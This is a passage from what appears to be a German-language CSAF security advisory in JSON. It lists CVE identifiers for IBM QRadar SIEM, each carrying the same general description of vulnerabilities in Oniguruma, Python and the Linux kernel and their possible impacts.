Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-1998" }, { "cve": "CVE-2023-20569", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-20569" }, { "cve": "CVE-2023-2162", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-2162" }, { "cve": "CVE-2023-2163", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-2163" }, { "cve": "CVE-2023-2166", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-2166" }, { "cve": "CVE-2023-2176", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-2176" }, { "cve": "CVE-2023-23455", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-23455" }, { "cve": "CVE-2023-2513", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-2513" }, { "cve": "CVE-2023-26545", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-26545" }, { "cve": "CVE-2023-27043", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-27043" }, { "cve": "CVE-2023-28322", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-28322" }, { "cve": "CVE-2023-28328", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-28328" }, { "cve": "CVE-2023-28772", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-28772" }, { "cve": "CVE-2023-30456", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-30456" }, { "cve": "CVE-2023-31084", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-31084" }, { "cve": "CVE-2023-3138", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-3138" }, { "cve": "CVE-2023-3141", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-3141" }, { "cve": "CVE-2023-31436", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-31436" }, { "cve": "CVE-2023-3161", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-3161" }, { "cve": "CVE-2023-3212", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-3212" }, { "cve": "CVE-2023-32324", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-32324" }, { "cve": "CVE-2023-32360", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-32360" }, { "cve": "CVE-2023-3268", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-3268" }, { "cve": "CVE-2023-33203", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-33203" }, { "cve": "CVE-2023-33951", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-33951" }, { "cve": "CVE-2023-33952", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-33952" }, { "cve": "CVE-2023-34241", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-34241" }, { "cve": "CVE-2023-35823", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-35823" }, { "cve": "CVE-2023-35824", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden." } ], "release_date": "2024-05-09T22:00:00Z", "title": "CVE-2023-35824" }, { "cve": "CVE-2023-3609", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, 